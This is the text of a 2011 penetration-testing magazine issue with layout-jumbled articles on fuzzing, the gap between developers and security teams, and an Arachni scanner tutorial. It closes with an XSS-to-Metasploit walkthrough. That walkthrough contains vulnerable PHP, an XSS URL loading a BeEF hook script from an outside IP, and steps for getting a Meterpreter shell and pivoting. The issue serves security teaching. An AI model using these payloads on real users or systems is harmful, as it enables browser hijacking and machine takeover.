Fuzz testing is the most efficient method for discovering both known and unknown vulnerabilities in software. It is based on sending anomalous (invalid or unexpected) data to the test target - the same method that is used by hackers and security researchers when they look for weaknesses to exploit. There are no false positives, if the anomalous data causes abnormal reaction such as a crash in the target software, then you have found a critical security flaw. In this article, we will highlight the most important requirements in a fuzzing tool and also look at the most common mistakes people make with fuzzing.

There are abundance of fuzzing tools available. How to distinguish a good fuzzer, what are the qualities that a fuzzing tool should have? Model-based test suites: Random fuzzing will certainly give you some results, but to really target the areas that are most at risk, the test cases need to be based on actual protocol models. This results in huge improvement in test coverage and reduction in test execution time. Easy to use: Most fuzzers are built for security experts, but in QA you cannot expect that all testers understand what buffer overflows are. Fuzzing tool must come with all the security knowhow built-in, so that testers only need the domain expertise from the target system to execute tests. Automated: Creating fuzz test cases manually is a time-consuming and difficult task. A good fuzzer will create test cases automatically. Automation is also critical when integrating fuzzing into regression testing and bug reporting frameworks. Test coverage: Better test coverage means more discovered vulnerabilities. Fuzzer coverage must be measurable in two aspects: specification coverage and anomaly coverage. Scalable: Time is almost always an issue when it comes to testing. User must also have control on the fuzzing parameters such as test coverage. In QA you rarely have much time for testing, and therefore need to run tests fast. Sometimes you can use more time in testing, and can select other test completion criteria.

PROPERTIES OF A GOOD FUZZING TOOL

Documented test cases: When a bug is found, it needs to be documented for your internal developers or for vulnerability management towards third party developers. When there are billions of test cases, automated documentation is the only possible solution. Remediation: All found issues must be reproduced in order to fix them. Network recording (PCAP) and automated reproduction packages help you in delivering the exact test setup to the developers so that they can start developing a fix to the found issues.

MOST COMMON MISTAKES IN FUZZING

Not maintaining proprietary test scripts: Proprietary tests scripts are not rewritten even though the communication interfaces change or the fuzzing platform becomes outdated and unsupported. Ticking off the fuzzing check-box: If the requirement for testers is to do fuzzing, they almost always choose the quick and dirty solution. This is almost always random fuzzing. Test requirements should focus on coverage metrics to ensure that testing aims to find most flaws in software. Using hardware test beds: Appliance based fuzzing tools become outdated really fast, and the speed requirements for the hardware increases each year. Software-based fuzzers are scalable in performance, and can easily travel with you where testing is needed, and are not locked to a physical test lab. Unprepared for cloud: A fixed location for fuzz-testing makes it hard for people to collaborate and scale the tests. Be prepared for virtual setups, where you can easily copy the setup to your colleagues, or upload it to cloud setups.

WEB APP SECURITY

Developers
are from Venus, Application Security guys from Mars
We know that Application Security people talk a different language than developers do whenever we publish a report, make an assessment, or when we review a software architecture from a security point of view. There is a gap between developers and the Application Security group. The two teams must interact with each other to reach the same goal of building secure code.

pplication Security members are considered like the tax man asking for money. Security is sometimes seen as a cost to pay in order to get an application into Production. Actually, it is a little of everyones fault. Since Security people and Developers usually do not talk the same language, it is difficult for the two groups to work together and give each other the necessary attention and feedback that they deserve. Lets take a step back for a minute and let me clarify what I mean about language and communication. Consider this scenario: The Marketing department has asked for a brand new web portal that shows new products from the ACME corporation. Marketers usually do not know anything about technology and they just want to hit the market with an aggressive campaign on the new product line. Marketers might ask the developers something like, Give us the latest Web 2.0, Social website enabled or something like that to impress the customers. Plus, they would like it as soon as possible, and they provide a deadline that the developers must keep. The developers brainstorm the idea, write out some specifications and requirements, start prototyping their ideas, and eventually begin coding. They are under pressure to meet the deadline and management usually presses even more to meet the proposed deadline. Security slowly is pushed aside, so that the coding and production can meet the deadline. Most software architecture is not designed with security in mind and in project Gantt Charts, there usually
01/2011 (1) November

are no security checkpoints included for code testing or allow time for security fixes or remediation. Developers are pushed to code the application so that they can meet the deadline. Acceptance tests and functionality tests are passed, and the application is almost ready for deployment when someone recalls something about security: Hey, we need to get this on-line. So, we need to open up firewall to allow access to it. The Security Application group asks for additional information about the application and request documentation of how the application was built. They do not see it from the developers point of view of meeting the deadline that Management has imposed on them. On the other side, developers do not see the problem from a security perspective: What risks to IT infrastructure will potentially be exposed if someone breaks into the new application? One solution to the problem is to execute a penetration tests on the application and look at the results. Then security is happy, since they can test the application and developers are happy once the penetration test report is complete. Many times a Penetration Test report contains recommended mitigation steps that impose additional time restraints on the application delivery. Reports usually contain just the symptom. For example, the report might have statements like; a SQL injection is possible, not the real root cause, a parameter taken from a config file is not sanitized before utilization. The report does not contain all
http://pentestmag.com

Page 20

of the information necessary to solve the problems at first glance. The developers cannot mitigate all of the issues in time to meet the deadline, so many times bug fixes are prolonged or pushed into the next revision of the software and in some cases they are never fixed. Another problem is when the two groups talk to each other at the end of the whole process and they use a non-common-ground language that further confuses or annoys everyone and further pushes the groups further apart.

Communications Breakdown: You Give Me The Report

Penetration test reports are most of the times useless from the developers point of view, because they do not give specific information where they can pinpoint where the problem is. This is very ironic, because the developers need to take full advantage of the security report, since most of remediation is source code fixes. Security issues found in Penetration testing is not for the faint of heart. There can be a lot of high-level security issues, grouped by OWASP Top 10 (most of time) with some generic remediation steps, such as: implement an input filtering policy. This information may not mean anything to a source code developer. They want to know what module, class, or line where the problem exists so that they can fix it. If provided enough time, developers can eventually determine where the problem exists, but usually they do not have the time to look through all of the code to find every testing error and still have time to get the application into production.

Lets Close the Gap

What we need to do is define a common ground where security can be integrated into source code somewhat painlessly. Security should be transparent from the development teams point of view. This can be achieved by: Create a development framework that has security built into it. Design an API to be used by the application.

Putting security into the framework is the Rails approach. Rails developers added a security facility inside the frameworks helpers, so developers inherit the secure input filtering, SQL injection protection and CSRF protection token. This is a huge step forward to assist developers with this problem. This methodology works with a programming language that contains a secure framework for developing web application. This is true for the Ruby community (other frameworks like Sinatra, do have some security facilities, as well). With the Java programming language community, there are a lot of nonstandardized frameworks available for Java developers,
01/2011 (1) November

but which is the right one to use to insure secure code development? .NET has one single monolithic framework and Microsoft has invested money in security and it seems they did it the right way, but it is not Open Source, so professionals cannot contribute. A generic framework based solution is not feasible. What about APIs? Developers do know how to use APIs and having security controls embedded into a single library can save the day when writing source code. That is why OWASP introduced ESAPI project to provide a set of APIs that developers can use to embed security controls into their code. The requested effort is minimal if compared to translate implement a filter policy into running code, and you (as a security professional) now speak the same language as the developer. This is a win-win approach. The security team and the application developers are now on the same page and everyone is happy. There is a third approach I will cover in a follow-up article. It is the BDD approach. BDD is the acronym for Behavior Driven Development, which means that you start writing test cases (taking examples from the Ruby on Rails world, you write most of time test beds using rspec and cucumber), modeling how the source code has to behave accordingly to the documentation or requirements specification. Initially, when you execute the test cases against your application, there will probably be failures that need to be corrected. The idea is straightforward. Using the WAPT activity, instead of a implement a filtering policy statement, you will produce a set of rspec/cucumber scenarios modeling how the source code can deal with malformed input. Then the development team starts correcting the code until it passes all of the test cases and when testing is complete and all tests pass, it will mean your source code has implemented a filtering policy. How has development changed? A new approach has been created to insure that the developers implement your remediation statement. Now the developers understand how to handle malformed entry statements and why they are so important to the Application Security group. The next article we will see how to write some security tests using the BDD approach in order to help a generic Lava developer to deal with cross-site scripting vulnerabilities.

PAOLO PEREGO
Paolo Perego is an application security specialist interested in xing the code he just broke with a web application penetration test. Hes interested in code review and hes working on his own hybrid analysis tool called aurora. He loves Ruby on Rails, kernel hacking, playing guitar and playing Tae kwon-do ITF martial art. Hes an husband and a daddy and a startup wannabe. You may want to check out Paolos blog or looking at his about me page.

Page 21

http://pentestmag.com

WEB APP VULNERABILITIES

Pulling the Legs of Arachni


Arachni is a fire-and-forget or point-and-shoot web application vulnerability scanner developed in Ruby by Tasos Zapotek Laskos. It got quite a good score for the detection of Cross-Site-Scripting and SQL Injection issues on the recently publicised vulnerability scanner benchmark by Shay-Chen.

rachni is not a so-called inspection proxy, such as the popular commercial but low-cost Burp Suite or the freeware Zed Attack Proxy of the Open Web Application Security project (OWASP). These tools are really meant to be used by a skilled consultant doing manual investigations of the application. Arachni can be better compared with commercial online scanners, which will be directed to the application and produce a report with no further interaction by the user. Every security consultant or hacker must understand the strengths and weaknesses of his or her toolset and to must choose the best combination of tools possible for the job at hand. Is Arachni worthwhile? Time for an in-depth review!

Table 1. Overview of Audit and Reconnaissance modules included with Arachni

Audit Modules
SQL injection Blind SQL injection using rDiff analysis Blind SQL injection using timing attacks CSRF detection Code injection (PHP, Ruby, Python, JSP, ASP.NET) Blind code injection using timing attacks (PHP, Ruby, Python, JSP, ASP.NET) LDAP injection Path traversal Response splitting OS command injection (*nix, Windows) Blind OS command injection using timing attacks (*nix, Windows) Remote le inclusion Unvalidated redirects XPath injection Path XSS URI XSS XSS XSS in event attributes of HTML elements XSS in HTML tags XSS in HTML 'script' tags

Recon Modules
Allowed HTTP methods Back-up les Common directories Common les HTTP PUT Insufficient Transport Layer Protection for password forms WebDAV detection HTTP TRACE detection Credit Card number disclosure CVS/SVN user disclosure Private IP address disclosure Common backdoors .htaccess LIMIT misconguration Interesting responses HTML object grepper E-mail address disclosure US Social Security Number disclosure Forceful directory listing

Under the Hood

According to the documentation Arachni offers the following: Simplicity: everything is simple and straight-forward from a users or component developers point of view; A stable, efficient and high-performance framework: Arachni allows custom modules, reports and plugins. Developers can easily use the advanced framework features without knowing the nitty gritty details.
01/2011 (1) November

Page 22

http://pentestmag.com

We can vouch that both simplicity and performance goals have been attained by Arachni. Since the framework is still under heavy development stability is sometimes lacking, but at no time this interfered with our vulnerability assessments. Arachni is highly modular, both from an architecture point of view as a source code point of view. The Arachni client (web or command-line) connects to one or more dispatchers, that will execute the scan. The connection to these dispatchers can be secured by SSL encryption and cert based authentication. One dispatcher can handle multiple clients. Multiple dispatchers can share a load and communicate with each other to optimise and speed-up the scanning process. The asynchronous scanning engine supports both HTTP and HTTPS and has pause/resume functionality. Arachni supports upstream proxies (for SOCKS4, SOCKS4A, SOCKS5, HTTP/1.1 and HTTP/1.0) as well as proxy authentication. The scanner can authenticate versus the web application using form-based authentication, HTTP Basic and Digest Authentication and NTLM. At the start of every scan a crawler will try to detect all pages. In version 0.3 this was optional, but since version 0.4 the crawler will always be run at the start of the scan. This crawler has filters for redundant pages based on regular expressions and counters and can include or exclude URLs based on regular expressions. Optionally the crawler can also follow subdomains. There is also an adjustable link count and redirect limit. The HTML parser can extract forms, links, cookies and headers. It can graciously handle badly written HTML due to a combination of regular expression analysis and the Nokogiri HTML parser. Arachni offers a very simple and easy to use module API, enabling a developer to access helper audit methods and writing custom modules in a matter of minutes. Arachni already includes a large number of modules: audit modules and reconnaissance (recon) modules. Table 1 provides an overview. Arachni offers report management. The following reports can be created: standard output, HTML, XML, TXT, YAML serialization and the Metareport, providing Metasploit integration for automated and assisted exploitation. Arachni has many build-in plug-ins, that have direct access to the framework instance. Plug-ins can be used to add any functionality to Arachni. Table 2 provides an overview of currently available plug-ins.

talks to one or more dispatchers that will perform the scanning job. New in the latest experimental branch is that dispatchers can communicate with each other and share the load (the Grid). This is great if you want to speed up the scan or if you want to execute some crazy things like running
Table 2. Included Arachni plug-ins. Plug-ins have direct access to the framework instance and can be used to add any functionality to Arachni

Plug-ins
Passive Proxy Analyses requests and responses between the web application and the browser assisting in AJAX audits, logging-in and/or restricting the scope of the audit. Performs an automated login. Performs dictionary attacks against HTTP Authentication and Forms based authentication. Performs taint analysis with benign inputs and response time analysis Keeps track of cookies while establishing a timeline of the changes. Generates a sitemap showing the health (vulnerability present or not) of each crawled/audited URL. Logs content-types of server responses aiding in the identication of interesting (possibly leaked) les. Establishes a baseline of normal behaviour and uses rDiff analysis to determine if malicious inputs cause any behavioural changes. Loads and runs high-level metaanalysis modules pre/mid/postscan AutoThrottle: Dynamically adjusts HTTP throughput during the scan for maximum bandwidth utilization. TimeoutNotice: Provides a notice for issues uncovered by timing attacks when the affected audited pages returned unusually high response times to begin with. It also points out the danger of DOS (Denail-of-Service) attacks against pages that perform heavy-duty processing. Uniformity: Reports inputs that are uniformly vulnerable across a number of pages hinting to the lack of a central point of input sanitization.

Form based AutoLogin Dictionary attacker

Proler

Cookie collector

Healthmap

Content-types

WAF (Web Application Firewall) Detector

Metamodules

Installation

Arachni consists of client-side (web or shell) and server-side functionality (the dispatchers). A client
01/2011 (1) November Page 23

http://pentestmag.com

WEB APP VULNERABILITIES


your dispatchers in multiple geographic zones thanks to Amazon Elastic Compute Cloud (EC2) or similar cloud providers. Lets get our hands dirty and start with the experimental branch (currently at version 0.4) so we can work with the latest and greatest functionality. Another benefit is that this experimental version can work under Windows. Installation under Linux is quick and easy, but a Windows set-up requires the installation of Cygwin first. Cygwin is a collection of tools that provide a Linuxlike environment on Windows, as well as providing a large part of Linux APIs. Another possibility is to run it natively in Windows using MinGW (Minimalistic GNU for Windows) but at this moment there are too many problems involved with that. Now you can hack the source code locally and play around with Arachni. If you encounter a Typhoeus related error while running Arachni, issue:
$ gem clean

Windows

Linux

Installation under Linux is quite straightforward. Open your favourite shell and execute the following commands: Listing 1. This will install all source directories in your home directory. Change all the cd commands if you want the sources somewhere else. In case you need an update to the latest versions, just cd into the three directories above, and perform:
$ git pull

Arachni comes with decent documentation, but I had a chuckle when I read the installation instructions for Windows: Windows users should run Arachni in Cygwin. I knew that this was not going to be a smooth ride. Since v0.3 some changes have been made to the experimental version to make it easier, so here we go. Please note that these installation instructions start with the installation of Cygwin and all required dependencies. Install or upgrade Cygwin by running setup.exe. Apart from the standard packages, include the following: Database: libsqlite3-devel, libsql3_0 Devel: doxygen, libffi4, gcc4, gcc4-core, gcc4-g++, git, libxml2, libxml2-devel, make, openssl-devel Editors: nano Libs: libxslt, libxslt-devel, libopenssl098, tcltk, libxml2, libmpfr4 Net: libcurl-devel, libcurl4
Listing 2. Installation for Windows
$ cd

$ rake install

Listing 1. Installation for Linux


$ sudo apt-get install libxml2-dev libxslt1-dev dev

libcurl4-openssl-dev libsqlite3-

$ git clone git://github.com/eventmachine/ $ cd eventmachine eventmachine.git

$ cd

$ git clone git://github.com/eventmachine/ $ cd eventmachine eventmachine.git

$ gem build eventmachine.gemspec $ cd

$ gem install eventmachine-1.0.0.beta.4.gem $ git clone git://github.com/Arachni/arachni-rpc.git $ cd arachni-rpc $ gem build arachni-rpc.gemspec $ cd

$ gem build eventmachine.gemspec $ cd

$ gem install eventmachine-1.0.0.beta.4.gem $ git clone git://github.com/Arachni/arachni-rpc.git $ cd arachni-rpc $ $ gem build arachni-rpc.gemspec $ cd

$ gem install arachni-rpc-0.1.gem $ git clone git://github.com/Zapotek/arachni.git $ cd arachni $ git checkout experimental $ rake install

$ gem install arachni-rpc-0.1.gem $ git clone git://github.com/Zapotek/arachni.git $ cd arachni $ git checkout experimental $ rake install

01/2011 (1) November

Page 24

http://pentestmag.com

Accept the installation of packages that are required to satisfy dependencies. Note that some of your other tools might not work with these libraries or upgrades. In any case, an upgrade of Cygwin usually results in recompiling any tools that you compiled earlier. Some additional libraries are needed for the compilation of Ruby in the next step and must be compiled by hand. First we need to install libffi. Execute the following commands in your Cygwin shell:
$ cd

Finally we can install Arachni (and the source) by executing the following commands in the Cygwin shell (note: these are the same commands as with the Linux installation): Listing 2. In case of weird error-messages (especially on Vista systems) regarding fork during compilation, execute the following in your Cygwin shell:
$ find /usr/local/ -iname *.so > /tmp/local.so.lst

$ git clone http://github.com/atgreen/libffi.git $ cd libffi $ make $ ./configure $ make install-libLTLIBRARIES

Quit all Cygwin shells. Use Windows to browse to C:\ cygwin\bin . Right click ash.exe, and choose run as administrator. Enter in ash:
$ /bin/rebaseall Exit ash.

$ /bin/rebaseall -T /tmp/local.so.lst

Next is libyaml. Download the latest stable version of libyaml (currently 0.1.4) from http:// http://pyyaml.org/ wiki/LibYAML and move it to your Cygwin home folder (probably C:\cygwin\home\your _ windows _ id). Execute the following:
$ cd

Light my Fire

$ tar xvf yaml-0.1.4.tar.gz $ cd yaml-0.1.4 $ ./configure $ make

How to fire up Arachni depends on whether you want to use it with the new (since version 0.3) web GUI or simply run everything through the commandline interface. Note that the current web GUI does not support all functionality that is available from the command-line. The GUI can be started by executing the following commands:
$ arachni_rpcd & $ arachni_web

$ make install

Now we need to compile and install Ruby. Download the latest stable release of Ruby (currently ruby-1.9.2p290.tar.gz) from http:// http://www.ruby.org/ and move it to your Cygwin home folder. Execute the following commands in the Cygwin shell:
$ cd

After that, browse to http://localhost:4567 and admire the new GUI. You will need to attach the GUI to one or more dispatchers. The dispatcher(s) will run the actual scan.

$ tar xvf ruby-1.9.2-p290.tar.gz $ cd ruby-1.9.2-p290 $ ./configure $ make

$ make install

From your Cygwin shell, update and install some necessary modules:
$ gem update system $ cd

$ gem install rake-compiler $ git clone http://github.com/djberg96/sys-proctable.git $ cd sys-proctable $ gem build sys-proctable.gemspec

$ gem install sys-proctable-0.9.1-x86-cygwin.gem

Figure 1. Edit Dispatchers

01/2011 (1) November

Page 25

http://pentestmag.com

WEB APP VULNERABILITIES


If you want to use the command-line interface, just execute:
$ arachni --help

Your First Scan

We will use both the command-line and the GUI. First the command-line: start a scan with all modules active. This is extremely easy:
$ arachni http://www.example.com --report =afr:outfile= www.example.com.afr

A quick overview of the other screens (Figure 1): Start a Scan: start a scan by entering the URL and pressing Launch scan. After a scan is launched, the screen gives an overview of what issues are detected and how far the process is. Modules: enable or disable the more than 40 audit (active) and recon (passive) modules that scan for vulnerabilities such as Cross-Site-Scripting (XSS), SQL Injection (SQLi), Cross-Site-Request Forgery (CSRF) or detect hidden features or simply make lists of interesting items such as email addresses. Plugins: plug-ins help to automate tasks. Plugins are more powerful than modules and enable to script login sequences, detect Web Application Firewalls (WAF), perform dictionary attacks, Settings: the settings screens allows to add cookies and headers, limit the scan to certain directories Reports: gives access to the scan reports. Arachni creates reports in its own internal format, and exports them to HTML, XML or text. Add-ons: three add-ons are installed: Auto-deploy: converts any SSH enabled Linux box in an Arachni dispatcher; Tutorial: serves as an example; Scheduler: schedules and run scan jobs at a specific time. Log: overview of actions taken by the GUI.

Afterwards the HTML report can be created by executing the following:


$ arachni --repload=www.example.com.afr --report=html: outfile=www.example.com.html

Thats it! Enabling or disabling modules is of course possible. Execute the following command for more information about the possibilities of the command-line interface:
$ arachni --help

Usually it is not necessary to include all recon modules. Some modules will create a lot of requests, making detection of your activities easier (if that is a problem with your assignment), and taking a lot more time to finish. List all modules with the following command:
$ arachni --lsmod

Enabling or disabling modules is easy: use the --mods switch followed by a regular expression to include modules or exclude modules by prefixing the regular expression with a dash. Example:
$ arachni --mods=*, -xss_* http://www.example.com

Figure 2. Start a scan screen

The above will load all modules, except the module related with Cross-Site-Scripting (XSS). Using the GUI makes this process even easier. Open the GUI by browsing to http://localhost:4567 and accept the default dispatcher. Next steps are to verify the settings in the Settings, Modules and Plugins screens. Once you are satisfied, proceed to the Start a Scan screen. If you want to run a scan against some test applications, visit my blog for the list of deliberately vulnerable applications. Most of these applications can be installed locally or can be attacked online (please read all related faqs and permissions before scanning a site. In most jurisdictions this is illegal unless permission is explicitly granted by the owner). After the scan, just go the Reports screen and download the report in the format you want.
Page 26

01/2011 (1) November

http://pentestmag.com

Listing 3. Create your own module


=begin Arachni print_ok( "Found #{dirname} at " + } res.effective_url )

Copyright (c) 2010-2011 Tasos "Zapotek" Laskos This is free software; you can copy and distribute this program under the term of the GPL v2.0 License =end (See LICENSE file for details) and modify tasos.laskos@gmail.com

@@__audited << path


def self.info

module Arachni module Modules # # Looks for common files on the server, based on wordlists generated from open # source repositories. # # More information about the SVNDigger wordlists: # # # The SVNDigger word lists were released under the GPL v3.0 License. # # @author: Herman Stevens # @see http://cwe.mitre.org/data/definitions/538.html #
class SvnDiggerDirs < Arachni::Module::Base def initialize( page )

:name

:description

=> 'SVNDigger Dirs',

based on wordlists created from open source repositories.

=> %q{Finds directories, The

wordlist utilized by this module derable :author

will be vast and will add a consi time to the overall scan time.}, .stevens@gmail.com> ', => '0.1', => {

amount of

http://www.mavitunasecurity.com/blog/svn-diggerbetter-lists-for-forced-browsing/

=> 'Herman Stevens <herman

:version

:references

'Mavituna Security' =>

blog/svn-digger-better-lists-for'OWASP Testing Guide' => forced-browsing/',

'http://www.mavitunasecurity.com/

Testing_for_Old,_Backup_and_ },

'https://www.owasp.org/index.php/

end

super( page )

Unreferenced_Files_(OWASP-CM-006)' => { 'Generic' => 'all' }, => %q{A SVNDigger

def prepare

:targets :issue :name

# to keep track of the requests and not repeat them @@__audited ||= Set.new @@__directories ||=[]
return if !@@__directories.empty?

=> {

:description => %q{}, :tags :cwe

directory was detected.},

read_file( 'all-dirs.txt' ) { |file|

'directory', 'discovery' ], => '538', => '',

=> [ 'svndigger', 'path',

end

@@__directories << file unless file.include?( '?' )

:severity

def run( )

:remedy_guidance

:cvssv2

=> Issue::Severity::INFORMATIONAL, => 'Review these

path = get_path( @page.url )

resources manually. Check if

return if @@__audited.include?( path )

unauthorized interfaces are exposed, :remedy_code => '', or confidential information.',

@@__directories.each { |dirname| url

print_status( "Scanning SVNDigger Dirs..." ) }

print_status( "Checking for #{url}" ) |res|

= path + dirname + '/'

log_remote_directory_if_exists( url ) {

end end end

end

01/2011 (1) November

Page 27

http://pentestmag.com

WEB APP VULNERABILITIES


Create your Own Module
Arachni is very modular and can be easily extended. In the following example we create a new reconnaissance module. Move into your Arachni source tree. Youll find the modules directory. In there youll find two directories: audit and recon. Move into the recon directory. We will create our Ruby module. Arachni makes it real easy: if your module needs external files, it will search into a subdirectory with the same name. Example: if you create a svn_digger_dirs.rb module, this module is able to find external files in the /modules/recon/svn_digger_dirs subdirectory. Our new reconnaissance module will be based on the SVNDigger wordlists for forced browsing. These wordlists are based on directories found in open source code repositories. If there is a directory that needed to be protected and you forget that, it will be found by a scanner that uses these wordlists. Furthermore, it can be used as a basis for reconnaissance: if a directory or file is detected, this might provide clues about what technology the site is using. Download the wordlists from the above URL. Create a directory /modules/recon/svn_digger_dirs and move the file all-dirs.txt from the wordlist archive to the newly created directory. Create a copy of the file /modules/recon/common_ directories.rb and name it svn_digger_dirs.rb. Change the code to read as follows: Listing 3. The code does not need a lot of explanation: it will check whether or not a specific directory exists, if yes, it will forward the name to the Arachni Trainer (who will include the directory in the further scans) as well as create a report entry for it. Note: the above code as well as another module based on the SVNDigger wordlists with filenames are now part of the experimental Arachni code base. is usually caused by Arachni not detecting the links to be audited. This weakness in the crawler can be partially offset by manually browsing the site with Arachni configured as a proxy. Excellent reporting capabilities, with links provided to additional information and also a reference to the standardised Common Weakness Enumeration (CWE).

Arachni lacks support for the following: No AJAX and JSON support; No JavaScript support

This means that you need to help Arachni finding links hidden in JavaScript, e.g. by using it as a proxy between your browser and the web application. Youll need a different tool (or use your brain and manual tests) to check for AJAX/JSON related vulnerabilities in the application you are testing. Arachni also cannot examine and decompile Flash components, but a lot of tools are at hand to help you with that. Arachni does not perform WAF (Web Application Firewall) evasion, but then again, this is not necessarily difficult to do manually for a skilled consultant or hacker. And, why not write your own module or plug-in that implements the missing functionality? Arachni is certainly a tool worth adding to your toolkit!

Conclusion

We used Arachni in many of our application vulnerability assessments. The good points are: Highly scalable architecture: just create more servers with dispatchers and share the load. This makes the scanner a lot more responsive and fast. Highly extensible: create your own modules, plugins and even reports with ease. User-friendly: start your scan in minutes. Very good XSS and SQLi detection, with very few false positives. There are false negatives, but this
01/2011 (1) November

HERMAN STEVENS
After a career of 15 years spanning many roles (developer, security product trainer, information security consultant, Payment Card Industry auditor, application security consultant) Herman Stevens now works and lives in Singapore, where he is the director of his company Astyran Pte Ltd (http://www.astyran.com). Astyran specialises in application security, such as penetration tests, vulnerability assessments, secure code reviews, awareness training and security in the SDLC. Contact Herman through email (herman. stevens@gmail.com) or visit his blog (http://blog.astyran.sg).

Page 28

http://pentestmag.com

WEB APP VULNERABILITIES

XSS Beef Metaspoilt Exploitation


Cross Site scripting (XSS) is an attack in which an attacker exploits a vulnerability in application code and runs his own JavaScript code on the victims browser. The impact of an XSS attack is only limited by the potency of the attackers JavaScript code.

n most commercial penetration testing reports, its sufficient to just show a small alert popup; this is to show that a particular parameter is vulnerable to an XSS attack, However, this is not how an attacker would function in the real world. Sure, hed use a pop up initially to find out which parameter is vulnerable to an XSS attack. Once hes identified that though, hell look to steal information by executing malicious JavaScript or even gain total control of the users machine. In this article, well look at how an attacker can gain complete control over a users browser, ultimately taking over the users machine, by using Beef (A browser exploitation framework).

sake, well assume that the attacker has already identified a vulnerable parameter on a page. Here are the relevant files, which you too can use on your web server if you want to try this also.

HTML Page
<HTML> <BODY> <FORM NAME=test action=search1.php method=GET> Search: <INPUT TYPE=text name=search></INPUT> </FORM> </BODY> </HTML> <INPUT TYPE=submit name=Submit value=Submit></INPUT>

A Simple POC

To start off though, lets do exactly what the attacker would do, which is to identify a vulnerability. For simplicitys

Figure 1. User enters in a search box

Figure 2. BeeF after conguration

01/2011 (1) November

Page 30

http://pentestmag.com

Figure 3. Connection with BeeF controller

Figure 5. What victim will see

Server Side PHP Code


<?php $a=$_GET[search];

?>

echo The parameter passed is $a;

As you can see; its some very simple code where the user enters something in a search box on the first page; his input is sent to the server, which reads the value of the parameter and prints it on to the screen. So, instead of a simple text input, the attack enters a simple JavaScript into the box; the JavaScript will execute on the users machine and not get displayed. The user hence has to just been tricked into clicking on a link http://localhost/search1.php?search=<script>aler t(document.domain)</script>. The screenshot below clarifies the above steps (Figure 1).

and click a few buttons to configure it. Alternatively you could use a distribution like Backtrack which already has BeeF installed. Here is a screenshot of how BeeF looks after it is configured (Figure 2). Instead of the user clicking on a link which will generate a popup box, the user will instead be tricked to click on a link which tells his browser to connect to the BeeF controller. The URL that the user has to click on is:
http://localhost/search1.php?search=<script src= </script>&Submit=Submit

http://192.168.56.101/beef/hook/beefmagic.js.php>

Beef Hook the users browser

Now, while this example is sufficient to prove that the site is vulnerable to XSS, its most certainly not what an attacker will stop at. An attacker will use a tool like BeeF (Browser Exploitation Framework) to gain more control of the users browser and machine. I used an older version of Beef(0.3.2) as I just wanted to demonstrate what you can do with such a tool. The newer version has been rewritten completely and has many more features. For now though, extract Beef from the tarball and copy it into your web server directory

The IP address here is the one on which you have BeeF running. Once the user clicks on the link above, you should see an entry in the BeeF controller window showing that a Zombie has connected. You can see this in the Log section on the right hand side or the Zombie section on the left hand side. Here is a screenshot which shows that a browser has connected to the Beef controller (Figure 3). Click and highlight the zombie in the left pane and then click on Standard Modules Alert Dialog. This will result in a little popup box popping up on the victim machine. Heres a screenshot which shows the same (Figure 4). And this is what the victim will see (Figure 5). So as you can see, because of Beef even an unskilled attacker can run code which he does not even understand, on the victims machine and steal sensitive data. Hence, it becomes all the more

Figure 4. What attacer will see

Figure 6. Defacing the current Web Page

01/2011 (1) November

Page 31

http://pentestmag.com

WEB APP VULNERABILITIES

Figure 7. Detecting plugins on the user browser

important to protect against XSS. Well have a small section right at the end where I briefly tell you how to mitigate XSS. Ill quickly discuss a few more examples using Beef before we move on to using it as a platform for other attacks. Here are the screenshots for the same; these are all a result of clicking on the various modules available under the Standard Modules menu.

Figure 9. Jobs command

Defacing the Current Web Page

Figure 10. Metasploit after clicking Send Now

This results in the webpage being rewritten on the victim browser with the text in the DEFACE STRING box. Try it out! (Figure 6)

Detect all Plugins on the Users Browser

There are plenty of other plug-ins inside Beef under the Standard Modules and Browser modules tab, which you can try out for yourself. I wont discuss all of them here as the principle is the same. What I want to do now though is use the users hooked Browser to take complete control of the users machine itself (Figure 7).

Integrate Beef with Metasploit and get a shell

Figure 11. Meterpreter window - screenshot 1

Edit Beefs configuration files so that it can directly talk to Metasploit. All I had to edit was msf.php to set the correct IP address. Once this is done you can launch Metasploits browser based exploits from inside Beef.

Figure 8. startin Metaslpoit

Figure 12. Meterpreter window - screenshot 2

01/2011 (1) November

Page 32

http://pentestmag.com

References

http://www.technicalinfo.net/papers/CSS.html https://www.owasp.org/index.php/Cross-site_Scripting_ %28XSS%29 https://www.owasp.org/index.php/XSS_%28Cross_Site_ Scripting%29_Prevention_Cheat_Sheet http://beefproject.com/

Figure 13. Meterpreter window - screenshot 3

Now first ensure that the Zombie is still connected. Then click on Standard modules Browser Exploit and configure the exploit as per the screenshot below. Were basically setting the variables needed by Metasploit for the exploit to succeed (Figure 8). Open a shell and run msfconsole to start metasploit. Once you see the msf> prompt; click the zombie in the browser and click the Send Now button to send the exploit payload to the victim. You can immediately check if Beef can talk to Metasploit by running the jobs command (Figure 9). If the victims browser is vulnerable to the exploit selected (which in this case is the msvidctl_mpeg2 exploit) it will connect back to the running Metasploit instance. Heres what you see in Metasploit, a while after you click Send Now (Figure 10). Once youve got a prompt, youre on that remote system and can do anything that you want with the privileges of that user. Here are a few more screenshots of what you can do with Meterpreter. The screenshots are self explanatory so I wont say much (Figure 11-13). The user was apparently logged in with admin privileges and we could create a user by the name dennis on the remote machine. At this point of time we have complete control over 1 machine. Once we have control over this machine we can use FTP or HTTP and download various other tools like Nmap, Nessus, a sniffer to capture all keystrokes on this machine or even another copy of Metasploit and install these on this machine. We can then use these to port scan an entire internal network or search for vulnerabilities in other services that are running on other machines on the network. Eventually, over a period of time, it is potentially possible to compromise every machine on that network.

Make a list of parameters whose values depend on user input and whose resultant values after they are processed by application code, are reflected in the users browser. All such output, as in a) must be encoded before displaying it to the user. The OWASP XSS prevention cheatsheet is a good guide for the same. White List and Black list filtering can also be used to completely disallow specific characters in user input fields.

Conclusion

In a nutshell, we can conclude that if even a single parameter is vulnerable to XSS it can result in the complete compromise of that users machine. If the XSS is persistent then the number of users that could potentially be in trouble increases. So while XSS does involve some kind of user input, like clicking a link or visiting a page, it is still a high risk vulnerability and must be mitigated throughout every application.

ARVIND DORAISWAMY
Arvind Doraiswamy is an Information Security Professional with 6 years of experience in System,Network and Web Application Penetration testing. In addition, he freelances in information security audits, trainings and product development [Perl, Ruby on Rails], while spending a lot of time learning more about malware analysis and reverse engineering. Email arvind.doraiswamy@gmail.com Linked In http://www.linkedin.com/pub/arvind-doraiswamy/ 39/b21/332 Other writings http://resources.infosecinstitute.com/author/ arvind/ AND http://ardsec.blogspot.com

Mitigation

To mitigate XSS one must do the following:


01/2011 (1) November

Page 33

http://pentestmag.com

WEB APP VULNERABILITIES

Cross-site Request Forgery


